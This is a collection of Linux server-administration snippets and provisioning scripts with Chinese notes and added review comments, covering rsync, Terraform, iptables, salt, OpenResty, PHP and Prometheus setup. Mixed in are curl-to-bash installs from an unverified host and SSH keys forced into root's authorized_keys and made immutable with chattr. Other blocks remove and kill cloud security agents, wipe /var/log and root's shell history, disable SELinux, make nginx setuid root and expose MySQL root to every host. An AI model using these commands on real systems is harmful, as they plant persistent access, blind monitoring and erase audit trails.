/etc/security/limits.conf (注意同时要留意 /etc/security/limits.d/下面的参数)
root soft nofile 65535
root hard nofile 65535
* soft nofile 65535
* hard nofile 65535
* soft nproc 65535
* hard nproc 65535
还要追加下面一行给(/etc/pam.d/login)
session required pam_limits.so
usermod -aG wheel ywgx (把 ywgx 添加入wheel分组)
rsync -av --progress --delete /tmp/abc ywgx@base.xabcstack.com:/tmp/ (这个会把当前主机 /tmp/abc 同步到目标机器 /tmp/ 目录下,如果没有自动创建abc目录)
rsync --daemon --config=./rsyncd.conf
rsync -aq --progress root@repo.xabcstack.com::salt .
rsync -aq --progress --delete --exclude={"COMMIT",} /cache/sys root@172.18.10.144:/cache/ (把当前主机 /cache/sys 目录同步到目标机器 /cache/, 跳过/cache/sys/COMMIT 这个目录 )
return 301 https://$host$request_uri;
awk '{ print $(NF-2) }'
scp -P 12349 upload_file username@server
echo "*/5 * * * * pgrep sentinel.py||/srv/zero/sentinel.py &>/var/log/xabc.log &" > /var/spool/cron/root
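# Delete entries under the Jenkins jobs tree whose name starts with a digit and whose
# mtime is older than 3 days (-mtime +3).
# find passes the paths straight to rm, so a name containing spaces or glob characters is
# not re-split by the shell before `rm -rf` sees it; -prune stops find from descending
# into a directory that is about to be removed.
find /root/.jenkins/jobs -maxdepth 6 -name "[0-9]*" -mtime +3 -prune -exec rm -rf -- {} +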
*/5 * * * * pgrep nginx||/opt/openresty/nginx/sbin/nginx
netstat -aulntp
nc -vuz 100.67.1.217 514 (探测主机100.67.1.217 UDP 514 端口是否打开)
Influxdata 数据备份和恢复
备份:
influxd backup -database database_name 数据存储位置
influxd backup -database database_name -host localhost:8088 数据存储位置 # 远程备份
恢复元数据:
influxd restore -metadir /var/lib/influxdb/meta/ 元数据存储位置
influxd restore -database database_name -datadir /var/lib/influxdb/data 数据存储位置
修改权限:
chown -R influxdb:influxdb /var/lib/influxdb
重启influxdb:
service influxdb stop
service influxdb start
磁盘挂载
1. fdisk -l
2. mkfs.ext4 /dev/vd{x}
3. mount /dev/vd{x} /media
4. vim /etc/fstab
/dev/vd{x} /media ext4 defaults 0 0
时区设置
timedatectl set-timezone Asia/Shanghai
timedatectl 查看时间设置
chronyc sources -v 查看时间同步状态
提示Read-only file system,执行命令 mount -o remount rw /
同步本地时间到硬件
hwclock --systohc
通过redis-cli导入数据
通过在ECS上的redis-cli,可将用户ECS上原有的数据导入到云数据库Redis版中,操作代码为:
# redis-cli -h old_instance_ip -p old_instance_port config set appendonly yes
# redis-cli -h aliyun_redis_instance_ip -p 6379 -a password --pipe < appendonly.aof
# terraform
terraform version 查看 Terraform 版本
terraform init 初始化 Terraform
terraform plan Terraform 执行计划
terraform apply 应用 Terraform
terraform show 检查 Terraform 状态
terraform output 查看输出变量的值
terraform graph 生成资源依赖图
terraform destroy 销毁资源
terraform workspace 管理 Terraform 工作区
terraform workspace new 新建工作区
terraform workspace list 列出工作区
terraform workspace select 切换工作区
terraform workspace delete 删除工作区
terraform get 下载或更新 Terraform 模块
terraform fmt 格式化 Terraform 代码
terraform validate 检查 Terraform 语法
terraform console Terraform 控制台
# Drop traffic from and to xmr.crypto-pool.fr (presumably a mining pool, judging by the name).
# iptables resolves the name once, when the rule is added, and stores the addresses it got
# then; pair this with DNS-level blocking if the name can move to other addresses.
iptables -I INPUT -s xmr.crypto-pool.fr -j DROP
# NOTE(review): -A appends, so an earlier ACCEPT rule in OUTPUT would still win; confirm rule order.
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP
# Accept inbound SSH (tcp/22) from any source address.
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
# Rewrite the MSS option of outgoing TCP SYN packets to 1024 bytes.
iptables -t mangle -I POSTROUTING -p tcp -m tcp --tcp-flags SYN,RST SYN -j TCPMSS --set-mss 1024
firewall
systemctl start firewalld
firewall-cmd --reload
firewall-cmd --permanent --add-service=http
firewall-cmd --permanent --add-service=https
-- Switch to the mysql system schema and allow the root account to connect from any host.
-- NOTE(review): host '%' exposes root to every address that can reach the port. Prefer a
-- dedicated least-privilege account limited to the admin network, and keep root on localhost.
use mysql;
update user set host = '%' where user = 'root';
FLUSH PRIVILEGES;i if [ $USER = ywgx ];then
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/vim.tgz -O -|tar xzf - -C ~
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.gitconfig -O ~/.gitconfig
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.gitignore -O ~/.gitignore
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.my.cnf -O ~/.my.cnf
wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.wgetrc -O ~/.wgetrc
# Install the "ywgx" public key unless a marker substring of it is already in the file.
# NOTE(review): chattr +ai leaves authorized_keys append-only and immutable, so key rotation
# or revocation by configuration management fails until the flags are cleared; record this
# for the host and check `lsattr` during access reviews.
if ! grep -q "ge4MSI5hlWSw" ~/.ssh/authorized_keys &>/dev/null;then
# If the file exists, clear the attributes so it can be appended to; otherwise (or if
# chattr fails) make sure ~/.ssh exists with mode 700.
[ -e ~/.ssh/authorized_keys ]&&chattr -ai ~/.ssh/authorized_keys||mkdir -p -m 700 ~/.ssh
echo "ssh-rsa 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 ywgx" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chattr +ai ~/.ssh/authorized_keys
fi
# Same procedure for the "xabc" public key.
if ! grep -q "Ogsuw71ublt" ~/.ssh/authorized_keys &>/dev/null;then
[ -e ~/.ssh/authorized_keys ]&&chattr -ai ~/.ssh/authorized_keys||mkdir -p -m 700 ~/.ssh
echo "ssh-rsa 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 xabc" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chattr +ai ~/.ssh/authorized_keys
fi
fidba # 更改数据库 users 表里面字段名称
ALTER TABLE users RENAME COLUMN request_count TO requests;
j echo doing...
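# Run the helper snippets b, e and v, then install the bundled JDK and Tomcat under /opt.
# NOTE(review): without a scheme curl uses plain http, and the reply is executed by bash
# unchecked; fetch over https with -f and verify a pinned digest before running it.
curl -s xabc.io/b|bash
curl -s xabc.io/e|bash
curl -s xabc.io/v|bash
# Stage in a private mktemp directory. The *.sh files end up in /etc/profile.d and are
# sourced by every login shell, so they must not pass through the predictable, shared
# /tmp/java where another local user could place or alter them first.
stage_dir=$(mktemp -d) || exit 1
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/src/java.tgz -O -|tar xzf - -C "$stage_dir"
tar xzf "$stage_dir/java/files/jdk.tgz" -C /opt
tar xzf "$stage_dir/java/files/tomcat.tgz" -C /opt
mv "$stage_dir"/java/files/*.sh /etc/profile.d/
rm -rf -- "$stage_dir"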
echo "/opt/{jdk,tomcat}"gitlab Git 全局设置
git config --global user.name "Administrator"
git config --global user.email "admin@example.com"
创建一个新仓库
git clone git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git
cd Monitoring
touch README.md
git add README.md
git commit -m "add README"
git push -u origin master
推送现有文件夹
cd existing_folder
git init
git remote add origin git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git
git add .
git commit -m "Initial commit"
git push -u origin master
推送现有的 Git 仓库
cd existing_repo
git remote rename origin old-origin
git remote add origin git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git
git push -u origin --all
git push -u origin --tags
查找版本号
git log --oneline
重置到某一版本
git reset --hard 版本号
m yum -y install wget
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum -y install salt-minion
systemctl enable salt-minion.serviceerr tail -f access.log|awk '$1 > 399 {print $0}'o echo doing...
curl -s xabc.io/b|bash
curl -s xabc.io/e|bash
curl -s xabc.io/v|bash
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
# Unpack the distro-specific OpenResty bundle into /opt and fetch its nginx.conf.
# NOTE(review): the archive is extracted as-is with no digest or signature check.
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/openresty-$OS.tgz -O -|tar xzf - -C /opt
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/nginx.conf -O /opt/openresty/nginx/conf/nginx.conf
mkdir -p /opt/openresty/nginx/conf/ssl
# Make sure a "nobody" user and group exist, then set the binary to owner root, group nobody.
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
groupadd -f nobody &>/dev/null
chown root.nobody /opt/openresty/nginx/sbin/nginx
# Start nginx at boot through rc.local; the chmod after ';' runs whether or not the
# line had to be appended.
if [ "$OS" = "RedHat" ]
then
grep -q nginx /etc/rc.d/rc.local||echo "/opt/openresty/nginx/sbin/nginx" >> /etc/rc.d/rc.local;chmod 755 /etc/rc.d/rc.local
fi
if [ "$OS" = "Debian" ]
then
grep -q nginx /etc/rc.local||echo "/opt/openresty/nginx/sbin/nginx" >> /etc/rc.local;chmod 755 /etc/rc.local
fi
# Adds execute for everyone plus the setuid and setgid bits: any local user who runs this
# binary gets root's effective UID.
# NOTE(review): if the aim is only to bind ports 80/443, start nginx from a systemd unit or
# grant `setcap cap_net_bind_service=+ep` instead of shipping a setuid-root binary.
chmod +xs /opt/openresty/nginx/sbin/nginx
echo "/opt/openresty"prb pgrep prometheus|xargs kill -9
pgrep blackbox|xargs kill -9
pgrep alertmanager|xargs kill -9
sleep 2
pgrep alertmanager||(/srv/zero/1/prometheus/alertmanager/alertmanager --config.file=/srv/zero/1/prometheus/alertmanager/alertmanager.yml --cluster.listen-address='' --storage.path=/srv/zero/1/prometheus/alertmanager/data &>/srv/zero/1/prometheus/logs/alertmanager.log &)
pgrep blackbox||(/srv/zero/1/prometheus/blackbox_exporter/blackbox_exporter --config.file=/srv/zero/1/prometheus/blackbox_exporter/blackbox.yml &>/srv/zero/1/prometheus/logs/blackbox_exporter.log &)
pgrep prometheus||(/srv/zero/1/prometheus/prometheus --config.file=/srv/zero/1/prometheus/prometheus.yml --storage.tsdb.path=/srv/zero/1/prometheus/data --web.enable-lifecycle &>/srv/zero/1/prometheus/logs/prometheus.log &)wp yum -y remove webtatic-release-7-3.noarch
# Re-add the Webtatic repository and switch the PHP 7.2 MySQL driver to mysqlnd.
# NOTE(review): PHP 7.2 no longer receives upstream security fixes; plan a move to a
# supported PHP branch before exposing phpMyAdmin.
yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
yum -y remove php72w-mysql
yum -y install php72w-mysqlnd
# NOTE(review): mode 777 lets every local account read and alter PHP session files.
# Give the directory to the user PHP runs as and use 0700/0770 instead.
chmod 777 /var/lib/php/session/
# Unpack phpMyAdmin under /opt/wordpress (no digest check) and hand it to nobody:nobody.
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/phpmyadmin.tgz -O -|tar xzf - -C /opt/wordpress
chown nobody.nobody -R /opt/wordpress/phpmyadmin
# NOTE(review): the snippet ends by printing a root login with a two-character password;
# replace that credential before the service is reachable.
echo "user:root password:io"php cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
yum -y install php72w
yum -y install php72w-cli php72w-common php72w-devel php72w-mysql php72w-fpm
yum -y install php72w-gd php72w-imap php72w-ldap php72w-odbc php72w-pear php72w-xml php72w-xmlrpc php72w-mbstring php72w-pdo
fi
if [ "$OS" = "Debian" ];then
apt-get -y install php7.[0-9]
apt-get -y install php7.[0-9]-mysql php7.[0-9]-fpm
apt-get -y install php7.[0-9]-gd php7.[0-9]-mbstring php7.[0-9]-xmlrpc
fie wget -q https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/ywgx.sh -O /etc/profile.d/ywgx.sh;chmod 644 /etc/profile.d/ywgx.shuuid cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y install libuuid-devel
fi
if [ "$OS" = "Debian" ];then
apt-get -y install uuid-dev
fix cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
rm -f /var/lib/rpm/__db*
rpm --rebuilddb
yum install -y yum-utils
yum clean all
yum-complete-transaction --cleanup-only
yum history redo last
package-cleanup --dupes;package-cleanup --problems
yum clean metadata
yum makecache
yum clean expire-cache
fi
if [ "$OS" = "Debian" ];then
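# Debian/Ubuntu repair sequence: finish half-configured packages, fix broken dependencies,
# then rebuild the package index from scratch.
dpkg --configure -a
apt-get --fix-broken install
# NOTE(review): apt-key is deprecated in current apt releases; kept for older hosts.
apt-key update
# --allow-unauthenticated and --force-yes were dropped: they make apt install packages whose
# signatures cannot be verified. If this step fails on signatures, repair the repository
# keys rather than bypassing the check.
apt-get -f -y install
apt-get clean
# Absolute path, so the shell's working directory is not changed as a side effect.
rm -rf /var/lib/apt/lists;mkdir -p /var/lib/apt/lists/partial
apt-get clean
apt-get update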
fiminion_clean systemctl stop salt-minion
pkill salt-minion &>/dev/null
killall salt-minion &>/dev/null
pkill salt-minion &>/dev/null
rm -fr /etc/salt/pki/minion /var/log/salt/minion*
service salt-minion restartdc curl -L https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m) -o /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose
a if ! grep -q "ge4MSI5hlWSw" /root/.ssh/authorized_keys &>/dev/null;then
[ -d /root/.ssh ]||mkdir -p -m 700 /root/.ssh
echo "ssh-rsa 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 local" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
fi
# Append the "ops" public key to root's authorized_keys unless a marker substring taken
# from the middle of the key is already present.
# NOTE(review): this grants root SSH login to whoever holds the matching private key.
# Track the key in the access inventory and prefer per-user accounts with sudo.
if ! grep -q "D70SYXrt" /root/.ssh/authorized_keys &>/dev/null;then
[ -d /root/.ssh ]||mkdir -p -m 700 /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCsqDg6fh5HpDUE5BC1orEy4miYe//+Y6JE9o4YLUQZSmMZmLxsr/+HznjHnNBxVHNrlrOR9Y9/+5sdrLRF+mNe4bGpiDzWZHGq9YqyBDLnJG1D0SYd6SFXtel1542LRW2CwUUGWq/O9uF91Kbqgcrc54Dh/2xVQLoN8tSn9D70SYXrtWLEeZWM/0fPJpO5wma+T7WgF9/2n3GVKEnX4xR79Y95OcEV0eFd0jsuJWraudrc7VIXkhEGxD0b3y4KZRZNPJqQnH1gRfrAtk5+vmLDL/fJZw6YWOB44R4oKG/3Vj1I8gsXVXGQwefVft2B/6JAY8m+aiHSp0zAullgmFn ops" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
fi
# NOTE(review): setenforce documents 0/1/Permissive/Enforcing; "-1" is not among them and
# any error is discarded here, so check whether the running mode changes at all.
# Turning SELinux off removes a containment layer for every service on the host; keep it
# enforcing and fix denials with a targeted policy module (audit2allow) instead.
which setenforce &>/dev/null&&setenforce -1 &>/dev/null
[ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/configos cat /etc/issue* /etc/*releasefile curl https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/filelist.sh -o /etc/profile.d/filelist.sh
# No -y here: yum waits for confirmation on stdin.
yum install axel wget
# Unpinned installs from PyPI, run as whichever user invokes the snippet.
pip3 install rsa
# NOTE(review): PyPI names are case-insensitive, so this resolves to the project named
# "crypto", which is presumably not the library behind the `Crypto` import namespace.
# Confirm what is intended. pycrypto, installed on the next line, is unmaintained;
# pycryptodome is the maintained package that provides the same namespace.
pip3 install Crypto
pip3 install pycryptos if ! grep -q "QmNkqIhy" /root/.ssh/authorized_keys &>/dev/null;then
[ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCciOA6PlTAAzYjSoavHXB+xyBG6PmhFumTPI7xrwsZfU/QjDxr3f/Q9x4RaqrQ+5i/wqxX00/ztR37WLza/6zn7gm06XqMMyZ4pdthxoJNS5eOKAXst8z1vTZsEIPY3ZzlQmNkqIhyUwcsc+4elHXdNB3DPxuxNYY8N7oHgZ7NYydZGHmPugpIjnAcDDh2llJ+RlO/oHnrU84gGAPtmf0me45TgFqDQj1sFzdAWB5iaChEq+/9t4B1vK78yM7zt3jDZfXoqdV/bB4DWaUB8X9WsgwTyrJflzzpsJSI1EhUgVAP6X0h13hR3tiyE3Xjksnc6Qbqu+JFm6e+opHf4+bn ywgx@E" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
fipython3 yum install -y python3-devel libcurl-develk rm -rf /etc/motd &>/dev/null
# Removes the cloud vendor host-agent directories (aegis, qcloud, cloudmonitor) and the
# aliyun.service unit, recreates the three directories empty, then force-kills the agent
# processes named below.
# NOTE(review): this takes the host out of the provider's security monitoring and assist
# channel, and the same command sequence is widely reported in unauthorised tooling, so it
# should raise an alert wherever it runs. Run it only under change control, with a
# replacement monitoring/EDR agent in place, and prefer the vendor's own uninstallers.
rm -fr /usr/local/{aegis,qcloud,cloudmonitor} &>/dev/null
rm -rf /lib/systemd/system/aliyun.service &>/dev/null
mkdir /usr/local/{aegis,cloudmonitor,qcloud}
killall -9 sgagent &>/dev/null
killall -9 barad_agent &>/dev/null
killall -9 aliyun_assist_update &>/dev/null
killall -9 aliyun_assist_update &>/dev/null
killall -9 AliSecureCheckAdvanced &>/dev/null
killall -9 CmsGoAgent.linux-amd64 &>/dev/null
kill -9 `pidof YDLive` &>/dev/null
kill -9 `pidof YDService` &>/dev/null
kill -9 `pidof wrapper` &>/dev/null
kill -9 `pidof AliYunDun` &>/dev/null
kill -9 `pidof AliYunDunUpdate` &>/dev/nullmysql cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/MariaDB.repo -O /etc/yum.repos.d/MariaDB.repo
yum -y install mariadb mariadb-server
systemctl start mariadb
systemctl enable mariadb
mysql_secure_installation
fi
if [ "$OS" = "Debian" ];then
apt-get -y install mysql-server
fimaster curl -s xabc.io/b|bash
curl -s xabc.io/v|bash
yum -y install epel-release
yum -y install wget net-tools gcc gcc-c++ make vim iptables iptables-services inotify-tools unzip psmisc rsync
[ -e /etc/rc.local ]&&sed -i '/qcloud/d' /etc/rc.local
timedatectl set-timezone Asia/Shanghai
hostnamectl --static set-hostname master-44.192.95.161;
systemctl disable firewalld
curl -s xabc.io/py3b|bash
yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm
yum clean expire-cache
yum -y install salt-master
yum -y install salt-ssh
yum -y install ansible
/usr/bin/pip3 install redis==3.5.3 flask cryptography==3.1 pyinotify
systemctl enable iptables.service
systemctl enable salt-master.service
[ -d /opt/sys ]||mkdir -p /opt/sys
[ -d /opt/master ]||mkdir -p /opt/master
[ -d /srv/salt ]||mkdir -p /srv/salt
[ -d /srv/reactor ]||mkdir -p /srv/reactor
[ -d /etc/sysconfig ]||mkdir -p /etc/sysconfig
[ -d /srv/zero/bin ]||mkdir -p /srv/zero/bin
[ -d /root/.pip ]||mkdir -p /root/.pip
[ -d /srv/pillar ]||mkdir -p /srv/pillar
[ -d /root/.xabc ]||mkdir -p /root/.xabc
[ -d /etc/ansible ]||mkdir -p /etc/ansible
[ -d /srv/salt/src ]||mkdir -p /srv/salt/src
[ -d /etc/sysctl.d ]||mkdir -p /etc/sysctl.d
[ -d /srv/salt/files ]||mkdir -p /srv/salt/files
[ -d /srv/salt/group ]||mkdir -p /srv/salt/group
[ -d /etc/salt/master.d ]||mkdir -p /etc/salt/master.d
[ -d /srv/salt/base/files ]||mkdir -p /srv/salt/base/files
[ -d /srv/salt/open/files ]||mkdir -p /srv/salt/open/files
[ -d /srv/zero/1/webhook ]||mkdir -p /srv/zero/1/webhook
[ -d /srv/zero/1/prometheus/rules ]||mkdir -p /srv/zero/1/prometheus/rules
[ -d /srv/zero/1/prometheus/conf/node ]||mkdir -p /srv/zero/1/prometheus/conf/node
[ -d /srv/zero/1/prometheus/conf/http ]||mkdir -p /srv/zero/1/prometheus/conf/http
[ -d /srv/zero/1/prometheus/conf/ping ]||mkdir -p /srv/zero/1/prometheus/conf/ping
[ -d /srv/zero/1/prometheus/conf/tcp ]||mkdir -p /srv/zero/1/prometheus/conf/tcp
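# Pull the master's configuration files, helper scripts and bundles from the project bucket.
# NOTE(review): nothing fetched here is checked against a digest or signature, yet it
# includes the firewall ruleset, the salt master config and scripts later run as root.
# Publish a checksum manifest and verify it before these files are used.
xabc_bucket=https://xabc-1251125987.cos.ap-nanjing.myqcloud.com

# xabc_fetch REMOTE_PATH DEST
# Download REMOTE_PATH from the bucket into a temporary file and copy it over DEST only
# when wget succeeds. `wget -O DEST` truncates DEST as soon as it starts, so a failed
# transfer used to leave an empty file behind (for example an empty /etc/sysconfig/iptables).
# The copy uses `cat >` so DEST keeps its mode, or gets the umask default, as before.
xabc_fetch() {
  local tmp
  tmp=$(mktemp) || return 1
  if wget -q -t 3 "$xabc_bucket/$1" -O "$tmp"; then
    cat "$tmp" >"$2"
  else
    printf 'download failed, %s left unchanged\n' "$2" >&2
  fi
  rm -f -- "$tmp"
}

xabc_fetch master/xabc.sh /etc/profile.d/xabc.sh
xabc_fetch master/pip.conf /root/.pip/pip.conf
xabc_fetch master/.bashrc /root/.bashrc
xabc_fetch files/telnet.py /usr/local/bin/telnet.py
xabc_fetch master/xabcdl /usr/local/bin/xabcdl
xabc_fetch redis/redis-cli /usr/local/bin/redis-cli
xabc_fetch master/redisdl /usr/local/bin/redisdl
xabc_fetch master/iptables /etc/sysconfig/iptables
xabc_fetch master/master /etc/salt/master
xabc_fetch master/Saltfile /etc/salt/Saltfile
xabc_fetch master/reactor.conf /etc/salt/master.d/reactor.conf
# The two bundles are unpacked before the files below, which are written into paths under
# /srv/zero/0 and /srv/zero/2 that nothing else in this part creates.
wget -q -t 3 "$xabc_bucket/matrix/R.tgz" -O -|tar xzf - -C /srv/zero
wget -q -t 3 "$xabc_bucket/matrix/P.tgz" -O -|tar xzf - -C /srv/zero/1
xabc_fetch master/redis.conf /srv/zero/2/redis/conf/redis.conf
xabc_fetch master/nginx.conf /srv/zero/0/openresty/nginx/conf/nginx.conf
xabc_fetch master/rc.local /etc/rc.d/rc.local
xabc_fetch master/xabc-sysctl.conf /etc/sysctl.d/xabc.conf
xabc_fetch master/genkey.py /opt/sys/genkey.py
xabc_fetch master/kk.py /srv/zero/bin/kk.py
xabc_fetch master/air.py /srv/zero/bin/air.py
xabc_fetch master/sentinel.py /srv/zero/bin/sentinel.py
xabc_fetch master/webhook.py /srv/zero/1/webhook/webhook.py
xabc_fetch master/.prometheus.yml /srv/salt/files/.prometheus.yml
xabc_fetch master/.alertmanager.yml /srv/salt/files/.alertmanager.yml
xabc_fetch master/top.sls /srv/salt/top.sls
xabc_fetch master/pillar_top.sls /srv/pillar/top.sls
xabc_fetch master/custom.sls /srv/salt/base/custom.sls
xabc_fetch master/conf.py /srv/zero/1/webhook/conf.py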
for i in blackbox_exporter.tgz node_exporter.tgz gpu_exporter.tgz;do wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/src/$i -O -|tar xzf - -C /srv/salt/src;done
ln -s /srv/salt/files/.prometheus.yml /srv/zero/1/prometheus/prometheus.yml
ln -s /srv/salt/files/.alertmanager.yml /srv/zero/1/prometheus/alertmanager/alertmanager.yml
ln -s /srv/salt/files/.node_exporter_rules.yml /srv/zero/1/prometheus/rules/node_exporter_rules.yml
ln -s /srv/salt/files/.blackbox_exporter_rules.yml /srv/zero/1/prometheus/rules/blackbox_exporter_rules.yml
ln -s /srv/salt/files/node_exporter_targets.yml /srv/zero/1/prometheus/conf/node/node_exporter_targets.yml
chmod +x /opt/sys/genkey.py /srv/zero/1/webhook/webhook.py /srv/zero/bin/kk.py /srv/zero/bin/sentinel.py /srv/zero/bin/air.py /etc/rc.local /etc/rc.d/rc.local
[ -e /srv/salt/base/files/cluster_id_rsa ]||/opt/sys/genkey.py
# Make sure a "nobody" user and group exist, then set the nginx binary to root:nobody.
id -u nobody &>/dev/null||useradd nobody -r -s /bin/false
groupadd -f nobody &>/dev/null
chown root.nobody /srv/zero/0/openresty/nginx/sbin/nginx
# NOTE(review): +xs adds setuid/setgid and execute for everyone, so any local user who runs
# this binary gets root's effective UID. A systemd unit or
# `setcap cap_net_bind_service=+ep` covers low-port binding without that.
chmod +xs /srv/zero/0/openresty/nginx/sbin/nginx
chmod +x /usr/local/bin/redis-cli /usr/local/bin/redisdl /usr/local/bin/xabcdl /usr/local/bin/telnet.py
# NOTE(review): OpenSSH has disabled DSA keys by default since 7.0, so this key is unlikely
# to be offered by a current sshd. Generate host keys with `ssh-keygen -A` or an ed25519 key.
[ -e /etc/ssh/ssh_host_dsa_key ]||ssh-keygen -q -t dsa -P '' -f /etc/ssh/ssh_host_dsa_key
# Deletes all of /var/log, the salt minion cache and root's shell history, then recreates
# an empty /var/log.
# NOTE(review): this erases the audit trail of the provisioning run, and services that
# expect their own subdirectory under /var/log may stop logging. If a clean image is the
# goal, ship or rotate the logs first instead of removing the tree.
rm -rf /var/log /var/cache/salt/minion /root/.bash_history;mkdir -p /var/log
echo -e "31 05 * * 1 find /root/.ssh/ /home/*/.ssh/ -name known_hosts -delete\n*/5 * * * * pgrep redis-server||(/srv/zero/2/redis/bin/redis-server /srv/zero/2/redis/conf/redis.conf)\n*/5 * * * * pgrep sentinel.py||(/srv/zero/bin/sentinel.py &>>/var/log/xabc.log &)\n*/5 * * * * pgrep webhook.py||(/srv/zero/1/webhook/webhook.py &>>/var/log/webhook.log &)\n*/5 * * * * pgrep blackbox||(/srv/zero/1/prometheus/blackbox_exporter/blackbox_exporter --config.file=/srv/zero/1/prometheus/blackbox_exporter/blackbox.yml &>/srv/zero/1/prometheus/logs/blackbox_exporter.log &)\n17 03 * * * /srv/zero/bin/air.py" > /var/spool/cron/root
pgrep redis-server||/srv/zero/2/redis/bin/redis-server /srv/zero/2/redis/conf/redis.conf
/srv/zero/bin/air.pypy3b if ! type python3 &>/dev/null;then
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
if [ ! -d "/usr/local/lib/python3.8" ];then
echo doing...
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/lib-python3.8.tgz -O -|tar xzf - -C /usr/local/lib
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/include-python3.8.tgz -O -|tar xzf - -C /usr/local/include
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/pip3.8 -O /usr/local/bin/pip3.8
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/python3.8 -O /usr/local/bin/python3.8
chmod +x /usr/local/bin/pip3.8 /usr/local/bin/python3.8
ln -s /usr/local/bin/python3.8 /usr/local/bin/python3
source /etc/profile
echo "done"
fi
fi
firunner yum install git -y
#curl -L --output /usr/local/bin/gitlab-runner https://gitlab-runner-downloads.s3.amazonaws.com/latest/binaries/gitlab-runner-linux-amd64
#chmod +x /usr/local/bin/gitlab-runner
#gitlab-runner install --user=root --working-directory=/root
#gitlab-runner start
#gitlab-runner registerpy3 cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "debian|ubuntu|Ubuntu"&&OS="Debian"
cat /etc/issue* /etc/*release 2>/dev/null|grep -qE "release|centos|CentOS"&&OS="RedHat"
if [ "$OS" = "RedHat" ];then
yum -y install yum-utils
yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl
yum -y install zlib-devel libffi-devel openssl-devel
fi
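# Debian/Ubuntu build dependencies for compiling CPython.
if [ "$OS" = "Debian" ];then
apt-get -y install libreadline-dev libpcre3-dev libssl-dev cmake perl libncurses5-dev build-essential
# libffi-devel is the RPM name; on Debian the package is libffi-dev. With the wrong name apt
# rejected the whole command, so zlib1g-dev was skipped as well.
apt-get -y install zlib1g-dev libffi-dev libssl-dev
fi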
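#PYTHON_VER=3.8.3
PYTHON_VER=3.9.2
# Build in a fresh private directory from mktemp. The fixed /tmp/build path could be
# pre-created by another local user, and ./configure and make run from it with the
# caller's (typically root's) privileges.
build_dir=$(mktemp -d) || exit 1
cd "$build_dir" || exit 1
# NOTE(review): the tarball is not verified; compare it with the digest published by
# python.org (placeholder: <EXPECTED_SHA256>) before building.
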